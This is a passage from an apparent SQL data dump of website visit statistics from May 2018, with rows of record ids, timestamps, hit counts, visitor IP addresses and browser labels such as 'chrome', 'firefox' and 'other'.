'54.36.148.177','other'),(238378,1525209489,2,2,0,0,'216.244.66.237','other'),(238379,1525209577,1,1,0,0,'54.36.149.23','other'),(238380,1525209794,1,1,0,0,'54.36.148.233','other'),(238381,1525209829,1,1,0,0,'54.36.148.231','other'),(238382,1525210076,1,1,0,0,'54.36.149.79','other'),(238383,1525210112,1,1,0,0,'54.36.148.111','other'),(238384,1525210200,1,1,0,0,'54.36.149.30','other'),(238385,1525210352,1,1,0,0,'193.70.34.209','chrome'),(238386,1525210677,1,1,0,0,'37.9.113.151','other'),(238387,1525210755,1,1,0,0,'54.36.148.224','other'),(238388,1525210793,1,1,0,0,'37.9.113.60','other'),(238389,1525210825,1,0,1,0,'66.249.66.155',''),(238390,1525210831,1,1,0,0,'216.244.66.237','other'),(238391,1525211105,1,1,0,0,'54.36.149.24','other'),(238392,1525211138,1,1,0,0,'54.36.148.249','other'),(238393,1525211214,1,1,0,0,'54.36.148.65','other'),(238394,1525211216,1,1,0,0,'54.36.148.129','other'),(238395,1525211316,1,1,0,0,'54.36.149.52','other'),(238396,1525211563,1,1,0,0,'54.36.148.170','other'),(238397,1525211807,2,2,0,0,'54.36.148.26','other'),(238398,1525211878,1,1,0,0,'54.36.149.75','other'),(238399,1525212163,1,1,0,0,'54.36.149.8','other'),(238400,1525212189,1,1,0,0,'54.36.149.20','other'),(238401,1525212344,1,1,0,0,'54.36.148.139','other'),(238402,1525212398,1,1,0,0,'54.36.149.56','other'),(238403,1525212586,1,1,0,0,'37.9.113.74','other'),(238404,1525212955,1,1,0,0,'54.36.148.240','other'),(238405,1525213172,1,1,0,0,'8.29.198.27','other'),(238406,1525213281,1,1,0,0,'54.36.148.126','other'),(238407,1525213466,1,1,0,0,'54.36.149.57','other'),(238408,1525213598,1,1,0,0,'54.36.149.104','other'),(238409,1525213773,1,1,0,0,'216.244.66.237','other'),(238410,1525213999,1,1,0,0,'54.36.148.177','other'),(238411,1525214005,1,1,0,0,'54.36.148.238','other'),(238412,1525214225,1,1,0,0,'54.36.148.106','other'),(238413,1525214275,1,1,0,0,'141.8.142.123','other'),(238414,1525214554,1,1,0,0,'37.9.113.63','other'),(238415,1525214605,1,1,0,0,'54.36.148.157','other'),(238416,1525214645,1,1,0,0,'54.36.148.61','other'),(238417,1525214744,2,2,0,0,'216.244.66.237','other'),(238418,1525214934,1,1,0,0,'54.36.148.87','other'),(238419,1525214938,1,1,0,0,'178.154.200.8','other'),(238420,1525214992,1,0,1,0,'66.249.66.155',''),(238421,1525215087,1,1,0,0,'54.36.149.21','other'),(238422,1525215198,1,1,0,0,'37.9.113.56','other'),(238423,1525215366,1,1,0,0,'54.36.148.82','other'),(238424,1525215387,1,1,0,0,'54.36.149.7','other'),(238425,1525215719,1,1,0,0,'54.36.148.115','other'),(238426,1525215853,1,1,0,0,'54.36.148.247','other'),(238427,1525216221,1,1,0,0,'54.36.148.173','other'),(238428,1525216261,1,1,0,0,'54.36.149.100','other'),(238429,1525216441,1,1,0,0,'37.9.113.82','other'),(238430,1525216444,1,1,0,0,'141.8.132.19','other'),(238431,1525216596,1,1,0,0,'54.36.149.74','other'),(238432,1525216749,1,0,1,0,'66.249.66.76',''),(238433,1525216764,1,1,0,0,'54.36.149.13','other'),(238434,1525216781,1,1,0,0,'54.36.148.165','other'),(238435,1525216811,1,1,0,0,'54.36.148.31','other'),(238436,1525217048,1,1,0,0,'54.36.148.26','other'),(238437,1525217050,1,1,0,0,'217.69.133.194','other'),(238438,1525217139,1,1,0,0,'54.36.148.62','other'),(238439,1525217269,1,1,0,0,'54.36.148.69','other'),(238440,1525217378,1,1,0,0,'54.36.148.114','other'),(238441,1525217821,1,1,0,0,'54.36.148.116','other'),(238442,1525217942,1,0,1,0,'66.249.66.157',''),(238443,1525218490,1,1,0,0,'8.29.198.26','other'),(238444,1525218590,2,0,2,0,'66.249.66.155',''),(238445,1525218908,1,1,0,0,'54.36.148.153','other'),(238446,1525218961,1,1,0,0,'54.36.148.190','other'),(238447,1525219312,1,1,0,0,'54.36.148.182','other'),(238448,1525219563,1,0,1,0,'66.249.66.156',''),(238449,1525219572,1,1,0,0,'95.108.213.24','other'),(238450,1525219793,1,1,0,0,'54.36.148.35','other'),(238451,1525220016,1,1,0,0,'207.46.13.81','other'),(238452,1525220137,1,1,0,0,'54.36.148.55','other'),(238453,1525220214,1,1,0,0,'54.36.148.97','other'),(238454,1525220660,1,1,0,0,'54.36.148.200','other'),(238455,1525220685,1,1,0,0,'54.36.148.220','other'),(238456,1525220790,1,1,0,0,'54.36.149.103','other'),(238457,1525220935,1,1,0,0,'54.36.149.74','other'),(238458,1525221045,1,1,0,0,'54.36.148.12','other'),(238459,1525221184,1,1,0,0,'40.77.167.111','other'),(238460,1525221198,1,0,1,0,'66.249.66.73',''),(238461,1525221504,1,1,0,0,'54.36.148.152','other'),(238462,1525221695,1,1,0,0,'217.69.133.217','other'),(238463,1525221720,1,0,1,0,'66.249.66.157',''),(238464,1525221725,1,0,1,0,'66.249.66.155',''),(238465,1525221749,1,1,0,0,'54.36.148.147','other'),(238466,1525222104,1,1,0,0,'54.36.148.115','other'),(238467,1525222423,1,1,0,0,'54.36.148.30','other'),(238468,1525222444,1,1,0,0,'40.77.167.25','other'),(238469,1525222482,1,1,0,0,'54.36.149.65','other'),(238470,1525222706,1,1,0,0,'54.36.148.232','other'),(238471,1525222754,1,1,0,0,'54.36.148.206','other'),(238472,1525222758,1,1,0,0,'54.36.148.190','other'),(238473,1525222802,1,1,0,0,'54.36.148.121','other'),(238474,1525222932,1,1,0,0,'54.36.149.31','other'),(238475,1525222985,1,1,0,0,'37.9.113.63','other'),(238476,1525223360,1,1,0,0,'54.36.148.20','other'),(238477,1525223463,1,1,0,0,'54.36.149.81','other'),(238478,1525224011,1,1,0,0,'8.29.198.25','other'),(238479,1525224090,1,1,0,0,'54.36.149.96','other'),(238480,1525224276,1,1,0,0,'54.36.148.115','other'),(238481,1525224334,1,1,0,0,'54.36.148.167','other'),(238482,1525224379,1,1,0,0,'54.36.149.91','other'),(238483,1525224486,1,1,0,0,'54.36.149.72','other'),(238484,1525224865,1,1,0,0,'37.9.113.60','other'),(238485,1525225122,1,1,0,0,'54.36.148.234','other'),(238486,1525225144,1,1,0,0,'54.36.149.47','other'),(238487,1525225529,1,1,0,0,'54.36.148.24','other'),(238488,1525225608,1,1,0,0,'180.76.15.141','other'),(238489,1525225875,1,1,0,0,'54.36.148.66','other'),(238490,1525225929,1,1,0,0,'54.36.148.117','other'),(238491,1525226032,1,1,0,0,'54.36.148.198','other'),(238492,1525226276,1,1,0,0,'216.244.66.237','other'),(238493,1525226494,1,1,0,0,'54.36.149.33','other'),(238494,1525226558,1,1,0,0,'54.36.148.210','other'),(238495,1525226679,1,1,0,0,'54.36.149.23','other'),(238496,1525227018,1,0,1,0,'66.249.66.76',''),(238497,1525227073,1,1,0,0,'66.249.66.76','chrome'),(238498,1525227083,1,1,0,0,'66.249.66.156','chrome'),(238499,1525227212,1,1,0,0,'54.36.148.127','other'),(238500,1525227766,1,1,0,0,'54.36.149.59','other'),(238501,1525227936,1,1,0,0,'54.36.148.68','other'),(238502,1525228010,1,1,0,0,'37.9.113.80','other'),(238503,1525228107,1,1,0,0,'54.36.148.40','other'),(238504,1525228285,1,1,0,0,'54.36.148.134','other'),(238505,1525228379,1,1,0,0,'54.36.148.154','other'),(238506,1525228679,1,1,0,0,'54.36.149.59','other'),(238507,1525229012,1,1,0,0,'54.36.148.217','other'),(238508,1525229038,1,1,0,0,'54.36.148.241','other'),(238509,1525229229,1,1,0,0,'54.36.148.177','other'),(238510,1525229291,1,1,0,0,'54.36.148.220','other'),(238511,1525229334,1,1,0,0,'8.29.198.27','other'),(238512,1525229402,1,1,0,0,'54.36.148.238','other'),(238513,1525229440,1,1,0,0,'54.36.149.32','other'),(238514,1525229473,1,0,1,0,'66.249.64.30',''),(238515,1525229502,1,1,0,0,'54.36.148.30','other'),(238516,1525229961,1,1,0,0,'217.69.133.222','other'),(238517,1525230169,1,1,0,0,'54.36.148.195','other'),(238518,1525230412,1,1,0,0,'54.36.148.116','other'),(238519,1525230522,1,1,0,0,'54.36.148.119','other'),(238520,1525230588,1,1,0,0,'54.36.148.106','other'),(238521,1525230700,1,1,0,0,'54.36.148.127','other'),(238522,1525230893,1,1,0,0,'54.36.148.144','other'),(238523,1525230932,1,1,0,0,'54.36.148.220','other'),(238524,1525231011,1,1,0,0,'54.36.148.184','other'),(238525,1525231132,1,1,0,0,'54.36.148.61','other'),(238526,1525231140,1,1,0,0,'54.36.148.56','other'),(238527,1525231301,1,1,0,0,'54.36.148.177','other'),(238528,1525231453,1,1,0,0,'54.36.149.27','other'),(238529,1525231460,1,1,0,0,'54.36.149.36','other'),(238530,1525231723,1,1,0,0,'54.36.148.66','other'),(238531,1525231841,1,1,0,0,'66.249.64.28','chrome'),(238532,1525231861,1,1,0,0,'54.36.148.137','other'),(238533,1525231998,1,1,0,0,'54.36.148.118','other'),(238534,1525232047,1,1,0,0,'54.36.148.69','other'),(238535,1525232050,1,1,0,0,'54.36.148.178','other'),(238536,1525232391,1,1,0,0,'54.36.149.14','other'),(238537,1525232492,1,1,0,0,'54.36.148.180','other'),(238538,1525232615,17,17,0,0,'95.216.5.146','other'),(238539,1525233345,1,1,0,0,'54.36.148.173','other'),(238540,1525233347,1,1,0,0,'54.36.148.222','other'),(238541,1525233451,1,0,1,0,'66.249.70.25',''),(238542,1525233455,1,1,0,0,'66.249.70.25','chrome'),(238543,1525233541,1,1,0,0,'54.36.148.119','other'),(238544,1525233546,1,1,0,0,'180.76.15.16','other'),(238545,1525233720,1,1,0,0,'213.180.203.40','other'),(238546,1525233842,1,1,0,0,'213.180.203.7','other'),(238547,1525234001,1,1,0,0,'37.9.113.56','other'),(238548,1525234207,1,1,0,0,'54.36.149.27','other'),(238549,1525234333,1,1,0,0,'54.36.149.7','other'),(238550,1525234385,1,1,0,0,'54.36.148.162','other'),(238551,1525234394,1,1,0,0,'54.36.148.235','other'),(238552,1525234471,1,1,0,0,'54.36.148.92','other'),(238553,1525234474,1,0,1,0,'66.249.64.29',''),(238554,1525234670,1,1,0,0,'216.244.66.237','other'),(238555,1525234838,1,1,0,0,'8.29.198.26','other'),(238556,1525234905,1,1,0,0,'54.36.148.165','other'),(238557,1525235050,1,1,0,0,'54.36.148.213','other'),(238558,1525235072,1,1,0,0,'54.36.148.51','other'),(238559,1525235147,1,1,0,0,'54.36.148.186','other'),(238560,1525235251,2,2,0,0,'54.36.149.44','other'),(238561,1525235482,1,1,0,0,'54.36.148.97','other'),(238562,1525235526,1,1,0,0,'54.36.149.77','other'),(238563,1525235575,1,1,0,0,'91.209.11.236','other'),(238564,1525235577,1,1,0,0,'54.36.148.77','other'),(238565,1525235857,1,1,0,0,'54.36.148.87','other'),(238566,1525235887,1,1,0,0,'54.36.148.23','other'),(238567,1525235917,1,0,1,0,'66.249.70.27',''),(238568,1525236087,1,1,0,0,'54.36.149.81','other'),(238569,1525236135,1,1,0,0,'54.36.148.58','other'),(238570,1525236146,3,3,0,0,'216.244.66.237','other'),(238571,1525236173,1,1,0,0,'54.36.149.52','other'),(238572,1525236309,1,1,0,0,'54.36.148.177','other'),(238573,1525236649,1,1,0,0,'54.36.148.168','other'),(238574,1525236657,1,1,0,0,'54.36.148.188','other'),(238575,1525237032,1,1,0,0,'54.36.149.101','other'),(238576,1525237102,3,3,0,0,'216.244.66.237','other'),(238577,1525237142,1,1,0,0,'54.36.148.51','other'),(238578,1525237287,1,1,0,0,'54.36.149.36','other'),(238579,1525237519,1,1,0,0,'178.154.200.41','other'),(238580,1525237761,1,1,0,0,'54.36.149.6','other'),(238581,1525237825,1,1,0,0,'54.36.148.242','other'),(238582,1525238514,1,1,0,0,'216.244.66.237','other'),(238583,1525238809,1,1,0,0,'157.55.39.198','other'),(238584,1525239028,1,1,0,0,'54.36.149.8','other'),(238585,1525239099,1,1,0,0,'95.135.6.39','chrome'),(238586,1525239640,1,1,0,0,'178.154.171.10','other'),(238587,1525239736,1,1,0,0,'66.249.70.29','chrome'),(238588,1525239747,1,1,0,0,'216.244.66.237','other'),(238589,1525240176,1,1,0,0,'8.29.198.25','other'),(238590,1525240475,1,1,0,0,'54.36.148.138','other'),(238591,1525240532,2,2,0,0,'91.196.178.97','chrome'),(238592,1525240631,1,1,0,0,'54.36.148.172','other'),(238593,1525240873,1,1,0,0,'54.36.148.51','other'),(238594,1525241093,1,1,0,0,'54.36.148.161','other'),(238595,1525241176,1,1,0,0,'54.36.148.254','other'),(238596,1525241384,1,1,0,0,'95.132.11.38','firefox'),(238597,1525241555,1,1,0,0,'216.244.66.237','other'),(238598,1525241636,1,1,0,0,'54.36.148.75','other'),(238599,1525241656,1,1,0,0,'54.36.149.74','other'),(238600,1525241708,1,1,0,0,'54.36.149.78','other'),(238601,1525241732,1,1,0,0,'54.36.148.42','other'),(238602,1525241739,1,1,0,0,'54.36.149.12','other'),(238603,1525241740,1,1,0,0,'54.36.148.237','other'),(238604,1525241878,2,2,0,0,'54.36.148.16','other'),(238605,1525241926,1,1,0,0,'54.36.149.69','other'),(238606,1525242244,2,2,0,0,'91.196.177.46','chrome'),(238607,1525242391,1,1,0,0,'54.36.148.148','other'),(238608,1525242555,2,2,0,0,'91.196.178.169','chrome'),(238609,1525242826,1,1,0,0,'37.52.18.129','firefox'),(238610,1525242881,1,1,0,0,'54.36.148.56','other'),(238611,1525242957,1,1,0,0,'216.244.66.237','other'),(238612,1525243081,1,1,0,0,'54.36.148.173','other'),(238613,1525243157,1,1,0,0,'167.114.219.41','other'),(238614,1525243372,1,1,0,0,'54.36.148.248','other'),(238615,1525243538,2,2,0,0,'54.36.148.190','other'),(238616,1525243713,1,1,0,0,'54.36.149.71','other'),(238617,1525243752,1,1,0,0,'54.36.149.15','other'),(238618,1525243868,1,1,0,0,'54.36.148.101','other'),(238619,1525244128,1,1,0,0,'54.36.148.68','other'),(238620,1525244769,1,1,0,0,'54.36.148.104','other'),(238621,1525244867,1,1,0,0,'54.36.149.102','other'),(238622,1525245140,1,0,1,0,'66.249.64.30',''),(238623,1525245306,1,1,0,0,'54.36.148.247','other'),(238624,1525245495,1,1,0,0,'92.113.180.4','chrome'),(238625,1525245637,1,1,0,0,'54.36.148.23','other'),(238626,1525245686,1,1,0,0,'8.29.198.25','other'),(238627,1525245745,1,1,0,0,'54.36.149.32','other'),(238628,1525245849,1,1,0,0,'66.249.70.27','chrome'),(238629,1525245879,3,3,0,0,'216.244.66.237','other'),(238630,1525245883,1,1,0,0,'54.36.148.58','other'),(238631,1525245945,1,1,0,0,'54.36.149.24','other'),(238632,1525246417,1,1,0,0,'54.36.149.42','other'),(238633,1525246463,1,1,0,0,'54.36.148.141','other'),(238634,1525246576,1,1,0,0,'54.36.148.83','other'),(238635,1525246586,1,1,0,0,'77.111.244.58','chrome'),(238636,1525246625,1,1,0,0,'54.36.149.15','other'),(238637,1525246781,1,1,0,0,'54.36.149.57','other'),(238638,1525246887,1,1,0,0,'54.36.148.183','other'),(238639,1525246932,1,1,0,0,'54.36.148.143','other'),(238640,1525247029,1,1,0,0,'216.244.66.237','other'),(238641,1525247057,1,1,0,0,'54.36.148.158','other'),(238642,1525247128,1,1,0,0,'54.36.148.240','other'),(238643,1525247132,1,1,0,0,'87.250.224.96','other'),(238644,1525247193,1,1,0,0,'54.36.149.104','other'),(238645,1525247299,1,1,0,0,'54.36.148.212','other'),(238646,1525247335,1,1,0,0,'66.249.64.28','chrome'),(238647,1525247442,1,1,0,0,'54.36.148.32','other'),(238648,1525247908,1,1,0,0,'54.36.149.101','other'),(238649,1525248400,1,1,0,0,'54.36.148.62','other'),(238650,1525248482,1,1,0,0,'54.36.148.84','other'),(238651,1525248543,1,1,0,0,'54.36.148.104','other'),(238652,1525248644,1,1,0,0,'91.196.178.97','chrome'),(238653,1525248860,1,1,0,0,'54.36.148.112','other'),(238654,1525249018,1,1,0,0,'178.154.200.45','other'),(238655,1525249056,1,1,0,0,'198.211.121.79','chrome'),(238656,1525249074,1,1,0,0,'54.36.148.179','other'),(238657,1525249115,1,1,0,0,'37.55.90.90','chrome'),(238658,1525249573,1,1,0,0,'54.36.148.70','other'),(238659,1525249779,2,2,0,0,'46.4.68.56','other'),(238660,1525249834,1,1,0,0,'93.183.194.157','chrome'),(238661,1525249937,2,2,0,0,'91.196.178.97','chrome'),(238662,1525250196,1,1,0,0,'54.36.148.137','other'),(238663,1525250277,1,1,0,0,'54.36.149.53','other'),(238664,1525250475,1,1,0,0,'54.36.149.76','other'),(238665,1525250482,1,1,0,0,'54.36.148.173','other'),(238666,1525250770,1,1,0,0,'54.36.149.44','other'),(238667,1525251016,1,1,0,0,'77.111.244.21','chrome'),(238668,1525251022,1,1,0,0,'8.29.198.25','other'),(238669,1525251028,1,1,0,0,'54.36.148.228','other'),(238670,1525251035,1,1,0,0,'54.36.149.97','other'),(238671,1525251139,1,1,0,0,'95.85.33.177','chrome'),(238672,1525251180,1,1,0,0,'54.36.148.48','other'),(238673,1525251231,1,1,0,0,'77.111.244.63','chrome'),(238674,1525251384,1,1,0,0,'95.132.11.38','firefox'),(238675,1525251427,1,1,0,0,'54.36.148.201','other'),(238676,1525251482,1,1,0,0,'54.36.148.115','other'),(238677,1525251584,1,1,0,0,'54.36.148.240','other'),(238678,1525251694,1,1,0,0,'54.36.148.134','other'),(238679,1525251888,1,1,0,0,'54.36.148.128','other'),(238680,1525251904,1,1,0,0,'54.36.149.73','other'),(238681,1525252044,1,1,0,0,'54.36.148.113','other'),(238682,1525252300,1,1,0,0,'54.36.148.21','other'),(238683,1525252444,1,1,0,0,'54.36.148.136','other'),(238684,1525252477,2,2,0,0,'195.10.210.70','chrome'),(238685,1525252478,1,1,0,0,'54.36.148.192','other'),(238686,1525252599,1,1,0,0,'91.196.177.46','chrome'),(238687,1525252800,1,1,0,0,'54.36.149.76','other'),(238688,1525252836,1,1,0,0,'207.46.13.62','other'),(238689,1525252852,1,1,0,0,'54.36.148.68','other'),(238690,1525252974,1,1,0,0,'54.36.148.45','other'),(238691,1525253070,1,1,0,0,'31.43.31.253','chrome'),(238692,1525253160,1,1,0,0,'54.36.148.100','other'),(238693,1525253270,1,1,0,0,'54.36.148.158','other'),(238694,1525253569,1,1,0,0,'91.196.178.97','chrome'),(238695,1525253591,1,1,0,0,'54.36.148.254','other'),(238696,1525254001,3,3,0,0,'95.133.187.198','chrome'),(238697,1525254339,1,0,1,0,'66.249.64.28',''),(238698,1525254556,1,1,0,0,'54.36.148.182','other'),(238699,1525254807,1,1,0,0,'54.36.148.54','other'),(238700,1525255157,1,1,0,0,'54.36.148.233','other'),(238701,1525255301,1,1,0,0,'95.132.23.212','firefox'),(238702,1525255437,1,1,0,0,'54.36.148.146','other'),(238703,1525255495,1,1,0,0,'54.36.149.94','other'),(238704,1525255564,1,1,0,0,'54.36.148.31','other'),(238705,1525255789,2,2,0,0,'91.196.178.72','chrome'),(238706,1525255903,1,1,0,0,'54.36.148.197','other'),(238707,1525255996,1,1,0,0,'95.135.52.200','chrome'),(238708,1525256014,1,1,0,0,'54.36.148.65','other'),(238709,1525256025,1,1,0,0,'54.36.148.21','other'),(238710,1525256207,1,1,0,0,'54.36.148.70','other'),(238711,1525256477,1,1,0,0,'54.36.148.236','other'),(238712,1525256490,1,1,0,0,'54.36.148.211','other'),(238713,1525256523,1,1,0,0,'8.29.198.26','other'),(238714,1525256587,1,1,0,0,'54.36.148.184','other'),(238715,1525257175,2,2,0,0,'78.111.190.82','chrome'),(238716,1525257213,1,1,0,0,'54.36.149.77','other'),(238717,1525257361,1,1,0,0,'54.36.148.26','other'),(238718,1525257407,1,1,0,0,'216.244.66.237','other'),(238719,1525257736,1,1,0,0,'180.76.15.155','other'),(238720,1525257909,2,2,0,0,'54.36.148.116','other'),(238721,1525258009,1,1,0,0,'54.36.148.112','other'),(238722,1525258279,1,1,0,0,'54.36.148.205','other'),(238723,1525258349,1,1,0,0,'54.36.148.206','other'),(238724,1525258647,1,1,0,0,'54.36.148.46','other'),(238725,1525258711,1,1,0,0,'54.36.148.241','other'),(238726,1525258768,1,1,0,0,'54.36.148.162','other'),(238727,1525258769,1,1,0,0,'54.36.149.38','other'),(238728,1525258811,1,1,0,0,'54.36.148.190','other'),(238729,1525259180,1,1,0,0,'54.36.149.62','other'),(238730,1525259209,1,1,0,0,'54.36.148.27','other'),(238731,1525259365,2,2,0,0,'54.36.149.81','other'),(238732,1525259393,1,1,0,0,'54.36.149.8','other'),(238733,1525259431,1,1,0,0,'54.36.148.14','other'),(238734,1525259441,1,1,0,0,'54.36.148.226','other'),(238735,1525259737,1,1,0,0,'54.36.148.33','other'),(238736,1525259791,1,1,0,0,'54.36.148.238','other'),(238737,1525259802,1,1,0,0,'54.36.148.96','other'),(238738,1525259820,1,1,0,0,'54.36.149.94','other'),(238739,1525259842,1,1,0,0,'54.36.148.181','other'),(238740,1525260005,1,1,0,0,'62.205.134.182','other'),(238741,1525260077,1,1,0,0,'54.36.148.174','other'),(238742,1525260096,1,1,0,0,'216.244.66.237','other'),(238743,1525260286,1,1,0,0,'37.52.17.254','firefox'),(238744,1525260449,1,1,0,0,'54.36.149.85','other'),(238745,1525260482,1,1,0,0,'54.36.149.42','other'),(238746,1525260731,1,1,0,0,'54.36.149.43','other'),(238747,1525260796,1,1,0,0,'54.36.148.82','other'),(238748,1525260866,1,1,0,0,'141.8.142.74','other'),(238749,1525261137,1,0,1,0,'66.249.64.30',''),(238750,1525261481,1,1,0,0,'54.36.148.42','other'),(238751,1525261590,1,1,0,0,'54.36.148.112','other'),(238752,1525261600,1,1,0,0,'54.36.148.101','other'),(238753,1525261871,1,1,0,0,'8.29.198.26','other'),(238754,1525261875,1,1,0,0,'54.36.148.215','other'),(238755,1525261889,1,1,0,0,'216.244.66.237','other'),(238756,1525261903,1,1,0,0,'54.36.148.130','other'),(238757,1525261962,2,2,0,0,'91.196.178.8','chrome'),(238758,1525262318,1,1,0,0,'54.36.149.71','other'),(238759,1525262455,1,1,0,0,'54.36.148.195','other'),(238760,1525262524,1,1,0,0,'54.36.149.76','other'),(238761,1525262667,1,1,0,0,'66.249.70.25','chrome'),(238762,1525262773,1,1,0,0,'66.249.64.28','chrome'),(238763,1525262874,1,0,1,0,'66.249.64.30',''),(238764,1525262920,1,1,0,0,'54.36.148.51','other'),(238765,1525263201,1,1,0,0,'54.36.148.25','other'),(238766,1525263218,1,1,0,0,'94.180.195.216','msie'),(238767,1525263276,1,1,0,0,'54.36.149.72','other'),(238768,1525263356,2,2,0,0,'95.132.11.38','firefox'),(238769,1525263407,3,3,0,0,'91.196.178.8','chrome'),(238770,1525263417,2,2,0,0,'216.244.66.237','other'),(238771,1525263427,1,1,0,0,'54.36.148.93','other'),(238772,1525263500,1,1,0,0,'54.36.148.119','other'),(238773,1525263583,3,3,0,0,'91.196.178.93','chrome'),(238774,1525263589,1,1,0,0,'141.8.142.74','other'),(238775,1525263688,2,2,0,0,'78.111.190.82','chrome'),(238776,1525263762,1,1,0,0,'54.36.149.51','other'),(238777,1525264013,1,1,0,0,'54.36.148.219','other'),(238778,1525264025,1,1,0,0,'54.36.148.145','other'),(238779,1525264177,1,1,0,0,'54.36.149.56','other'),(238780,1525264369,1,1,0,0,'54.36.149.99','other'),(238781,1525264387,1,1,0,0,'54.36.149.34','other'),(238782,1525264421,1,1,0,0,'91.196.178.8','chrome'),(238783,1525264430,1,1,0,0,'54.36.148.37','other'),(238784,1525264432,4,4,0,0,'91.196.178.91','chrome'),(238785,1525264459,1,1,0,0,'54.36.148.117','other'),(238786,1525264485,1,0,1,0,'66.249.64.29',''),(238787,1525264641,1,1,0,0,'54.36.149.14','other'),(238788,1525264663,2,2,0,0,'216.244.66.237','other'),(238789,1525264754,1,1,0,0,'37.9.113.182','other'),(238790,1525264793,1,1,0,0,'54.36.149.70','other'),(238791,1525264989,1,1,0,0,'91.196.178.97','chrome'),(238792,1525265015,1,1,0,0,'54.36.148.180','other'),(238793,1525265060,1,1,0,0,'54.36.149.103','other'),(238794,1525265100,1,1,0,0,'54.36.148.131','other'),(238795,1525265114,1,1,0,0,'54.36.149.60','other'),(238796,1525265267,1,1,0,0,'54.36.148.201','other'),(238797,1525265425,1,1,0,0,'141.8.142.74','other'),(238798,1525265467,1,1,0,0,'54.36.148.188','other'),(238799,1525265673,1,1,0,0,'54.36.148.19','other'),(238800,1525265701,1,1,0,0,'54.36.148.205','other'),(238801,1525265794,2,2,0,0,'91.196.178.93','chrome'),(238802,1525265824,1,1,0,0,'31.13.113.183','other'),(238803,1525265827,1,1,0,0,'31.13.114.146','other'),(238804,1525265828,1,1,0,0,'31.13.112.148','other'),(238805,1525265868,1,1,0,0,'173.252.92.247','other'),(238806,1525265979,1,1,0,0,'54.36.148.138','other'),(238807,1525265994,1,1,0,0,'54.36.149.26','other'),(238808,1525266177,1,1,0,0,'54.36.148.127','other'),(238809,1525266211,2,2,0,0,'91.196.178.8','chrome'),(238810,1525266249,1,1,0,0,'54.36.149.103','other'),(238811,1525266299,1,1,0,0,'54.36.148.206','other'),(238812,1525266311,1,1,0,0,'54.36.148.22','other'),(238813,1525266435,2,2,0,0,'91.196.178.161','chrome'),(238814,1525266487,2,2,0,0,'91.196.178.89','chrome'),(238815,1525266522,1,1,0,0,'54.36.149.33','other'),(238816,1525267061,1,1,0,0,'54.36.148.124','other'),(238817,1525267069,1,1,0,0,'54.36.149.32','other'),(238818,1525267079,1,1,0,0,'54.36.148.33','other'),(238819,1525267113,1,1,0,0,'54.36.149.23','other'),(238820,1525267340,2,2,0,0,'91.196.178.161','chrome'),(238821,1525267349,1,1,0,0,'8.29.198.25','other'),(238822,1525267545,1,1,0,0,'216.244.66.237','other'),(238823,1525267615,1,1,0,0,'194.187.218.3','other'),(238824,1525267802,1,1,0,0,'54.36.148.15','other'),(238825,1525267928,1,1,0,0,'94.231.178.125','chrome'),(238826,1525268042,1,1,0,0,'207.46.13.62','other'),(238827,1525268063,1,1,0,0,'54.36.148.248','other'),(238828,1525268092,1,1,0,0,'93.73.171.3','firefox'),(238829,1525268192,1,1,0,0,'141.8.142.74','other'),(238830,1525268285,1,1,0,0,'54.36.148.10','other'),(238831,1525268398,2,2,0,0,'91.196.178.93','chrome'),(238832,1525268709,1,1,0,0,'47.106.157.151','other'),(238833,1525268978,1,1,0,0,'54.36.148.239','other'),(238834,1525269079,1,1,0,0,'54.36.148.160','other'),(238835,1525269172,1,1,0,0,'54.36.148.250','other'),(238836,1525269282,1,1,0,0,'54.36.148.40','other'),(238837,1525269416,1,1,0,0,'54.36.148.182','other'),(238838,1525269657,1,1,0,0,'54.36.149.46','other'),(238839,1525269793,1,1,0,0,'54.36.148.86','other'),(238840,1525270078,1,1,0,0,'54.36.149.87','other'),(238841,1525270138,1,1,0,0,'91.196.178.93','firefox'),(238842,1525270161,1,1,0,0,'54.36.148.169','other'),(238843,1525270244,1,1,0,0,'46.211.122.85','other'),(238844,1525270396,1,1,0,0,'54.36.148.157','other'),(238845,1525270407,3,3,0,0,'216.244.66.237','other'),(238846,1525270500,1,1,0,0,'54.36.149.78','other'),(238847,1525270677,1,1,0,0,'54.36.148.55','other'),(238848,1525270684,1,1,0,0,'54.36.148.45','other'),(238849,1525270710,2,2,0,0,'91.196.178.8','chrome'),(238850,1525270834,1,1,0,0,'54.36.149.6','other'),(238851,1525270871,1,1,0,0,'54.36.149.45','other'),(238852,1525270872,1,1,0,0,'66.249.64.28','chrome'),(238853,1525271166,1,1,0,0,'37.73.229.65','chrome'),(238854,1525271237,1,1,0,0,'54.36.148.60','other'),(238855,1525271249,2,2,0,0,'54.36.148.255','other'),(238856,1525271275,1,1,0,0,'178.95.156.5','chrome'),(238857,1525271307,1,1,0,0,'54.36.148.106','other'),(238858,1525271395,1,1,0,0,'54.36.148.22','other'),(238859,1525271619,1,1,0,0,'54.36.148.208','other'),(238860,1525271679,1,1,0,0,'54.36.149.103','other'),(238861,1525271758,1,1,0,0,'54.36.149.11','other'),(238862,1525272126,1,1,0,0,'216.244.66.237','other'),(238863,1525272155,1,1,0,0,'54.36.148.123','other'),(238864,1525272274,1,1,0,0,'54.36.148.29','other'),(238865,1525272309,1,1,0,0,'54.36.149.61','other'),(238866,1525272418,1,1,0,0,'188.255.51.104','msie'),(238867,1525272590,1,1,0,0,'54.36.148.121','other'),(238868,1525272745,1,1,0,0,'8.29.198.25','other'),(238869,1525272775,1,1,0,0,'54.36.149.47','other'),(238870,1525272958,1,1,0,0,'54.36.148.226','other'),(238871,1525272966,1,1,0,0,'54.36.149.21','other'),(238872,1525273000,1,1,0,0,'54.36.148.47','other'),(238873,1525273062,1,1,0,0,'216.244.66.237','other'),(238874,1525273126,1,1,0,0,'54.36.148.137','other'),(238875,1525273139,1,1,0,0,'54.36.149.101','other'),(238876,1525273162,1,1,0,0,'54.36.149.105','other'),(238877,1525273178,1,1,0,0,'54.36.149.90','other'),(238878,1525273376,1,1,0,0,'54.36.148.193','other'),(238879,1525273515,1,1,0,0,'54.36.148.172','other'),(238880,1525273548,1,1,0,0,'54.36.149.36','other'),(238881,1525273605,1,1,0,0,'54.36.148.205','other'),(238882,1525273626,1,1,0,0,'54.36.148.240','other'),(238883,1525273641,1,1,0,0,'37.9.113.82','other'),(238884,1525273831,1,1,0,0,'54.36.149.71','other'),(238885,1525273843,1,1,0,0,'146.185.157.51','chrome'),(238886,1525273926,1,1,0,0,'54.36.148.251','other'),(238887,1525273973,1,0,1,0,'66.249.64.28',''),(238888,1525274011,1,1,0,0,'178.154.171.81','other'),(238889,1525274044,1,1,0,0,'54.36.149.21','other'),(238890,1525274151,1,1,0,0,'54.36.148.197','other'),(238891,1525274201,1,